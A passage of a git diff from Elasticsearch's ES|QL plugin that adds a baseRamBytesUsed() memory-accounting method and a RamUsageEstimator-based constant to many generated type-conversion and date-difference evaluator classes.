   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDoubleEvaluator.java
index 16b57b2ae740b..c48469420274d 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromDoubleEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.DoubleBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromDoubleEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator dbl;

   public ToStringFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator dbl,
@@ -100,6 +103,13 @@ public void close() {
     Releasables.closeExpectNoException(dbl);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += dbl.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoPointEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoPointEvaluator.java
index 48357b75b6c98..ab4ece6ff57ba 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoPointEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoPointEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromGeoPointEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromGeoPointEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator wkb;

   public ToStringFromGeoPointEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb,
@@ -120,6 +123,13 @@ public void close() {
     Releasables.closeExpectNoException(wkb);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += wkb.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoShapeEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoShapeEvaluator.java
index 67aa3596b82ba..c108ac5dd71a0 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoShapeEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromGeoShapeEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromGeoShapeEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromGeoShapeEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator wkb;

   public ToStringFromGeoShapeEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb,
@@ -120,6 +123,13 @@ public void close() {
     Releasables.closeExpectNoException(wkb);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += wkb.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIPEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIPEvaluator.java
index d3146ed7e845b..55aacc48dfa04 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIPEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIPEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromIPEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromIPEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator ip;

   public ToStringFromIPEvaluator(Source source, EvalOperator.ExpressionEvaluator ip,
@@ -120,6 +123,13 @@ public void close() {
     Releasables.closeExpectNoException(ip);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += ip.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIntEvaluator.java
index d8da5f73078cf..d017663f4dac8 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromIntEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.IntBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromIntEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator integer;

   public ToStringFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator integer,
@@ -100,6 +103,13 @@ public void close() {
     Releasables.closeExpectNoException(integer);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += integer.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromLongEvaluator.java
index 5d8eec190fb23..c0a3ff9a8701a 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromLongEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator lng;

   public ToStringFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator lng,
@@ -100,6 +103,13 @@ public void close() {
     Releasables.closeExpectNoException(lng);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lng.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromUnsignedLongEvaluator.java
index c3430e22eb64d..420a78af987f6 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromUnsignedLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromUnsignedLongEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.LongBlock;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromUnsignedLongEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromUnsignedLongEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator lng;

   public ToStringFromUnsignedLongEvaluator(Source source, EvalOperator.ExpressionEvaluator lng,
@@ -100,6 +103,13 @@ public void close() {
     Releasables.closeExpectNoException(lng);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lng.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromVersionEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromVersionEvaluator.java
index 30dbc6d2d9dc8..105209d11bae7 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromVersionEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToStringFromVersionEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToStringFromVersionEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToStringFromVersionEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator version;

   public ToStringFromVersionEvaluator(Source source, EvalOperator.ExpressionEvaluator version,
@@ -120,6 +123,13 @@ public void close() {
     Releasables.closeExpectNoException(version);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += version.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromBooleanEvaluator.java
index 06fa5184688a5..b36c366f2500c 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromBooleanEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanVector;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToUnsignedLongFromBooleanEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromBooleanEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator bool;

   public ToUnsignedLongFromBooleanEvaluator(Source source, EvalOperator.ExpressionEvaluator bool,
@@ -99,6 +102,13 @@ public void close() {
     Releasables.closeExpectNoException(bool);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += bool.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromDoubleEvaluator.java
index 9593866d2c844..8899617111108 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromDoubleEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToUnsignedLongFromDoubleEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromDoubleEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator dbl;

   public ToUnsignedLongFromDoubleEvaluator(Source source, EvalOperator.ExpressionEvaluator dbl,
@@ -114,6 +117,13 @@ public void close() {
     Releasables.closeExpectNoException(dbl);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += dbl.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromIntEvaluator.java
index 998b421d4ae93..c57e1c1c4c8a2 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromIntEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToUnsignedLongFromIntEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromIntEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator i;

   public ToUnsignedLongFromIntEvaluator(Source source, EvalOperator.ExpressionEvaluator i,
@@ -114,6 +117,13 @@ public void close() {
     Releasables.closeExpectNoException(i);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += i.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromLongEvaluator.java
index 5ee30aa71f28a..e4052e6845937 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromLongEvaluator.java
@@ -6,6 +6,7 @@
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -21,6 +22,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToUnsignedLongFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromLongEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator lng;

   public ToUnsignedLongFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator lng,
@@ -113,6 +116,13 @@ public void close() {
     Releasables.closeExpectNoException(lng);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lng.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromStringEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromStringEvaluator.java
index a1422cf096d83..70c95cf78bc58 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromStringEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/convert/ToUnsignedLongFromStringEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.Override;
 import java.lang.String;
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.BytesRefVector;
@@ -24,6 +25,8 @@
  * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead.
  */
 public final class ToUnsignedLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToUnsignedLongFromStringEvaluator.class);
+
   private final EvalOperator.ExpressionEvaluator in;

   public ToUnsignedLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator in,
@@ -118,6 +121,13 @@ public void close() {
     Releasables.closeExpectNoException(in);
   }

+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += in.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public static class Factory implements EvalOperator.ExpressionEvaluator.Factory {
     private final Source source;
Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ToVersionFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ToVersionFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator asString; public ToVersionFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator asString, @@ -120,6 +123,13 @@ public void close() { Releasables.closeExpectNoException(asString); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += asString.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisEvaluator.java index eee8c756930ab..b8d7f37bc4e8a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateDiffConstantMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffConstantMillisEvaluator.class); + private final Source source; private final DateDiff.Part datePartFieldUnit; @@ -63,6 +66,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += startTimestamp.baseRamBytesUsed(); + baseRamBytesUsed += endTimestamp.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, LongBlock startTimestampBlock, LongBlock endTimestampBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisNanosEvaluator.java index 5a0a6051abebb..3ef1b52fd4643 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateDiffConstantMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffConstantMillisNanosEvaluator.class); + private final Source source; private final DateDiff.Part datePartFieldUnit; @@ -63,6 +66,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += startTimestampMillis.baseRamBytesUsed(); + baseRamBytesUsed += endTimestampNanos.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, LongBlock startTimestampMillisBlock, LongBlock endTimestampNanosBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosEvaluator.java index dc28b97fef9aa..2b651148eb0b8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class DateDiffConstantNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DateDiffConstantNanosEvaluator.class); + private final Source source; private final DateDiff.Part datePartFieldUnit; @@ -63,6 +66,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += startTimestamp.baseRamBytesUsed(); + baseRamBytesUsed += endTimestamp.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, LongBlock startTimestampBlock, LongBlock endTimestampBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosMillisEvaluator.java index 477fb22548d2e..17987114f85be 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/date/DateDiffConstantNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
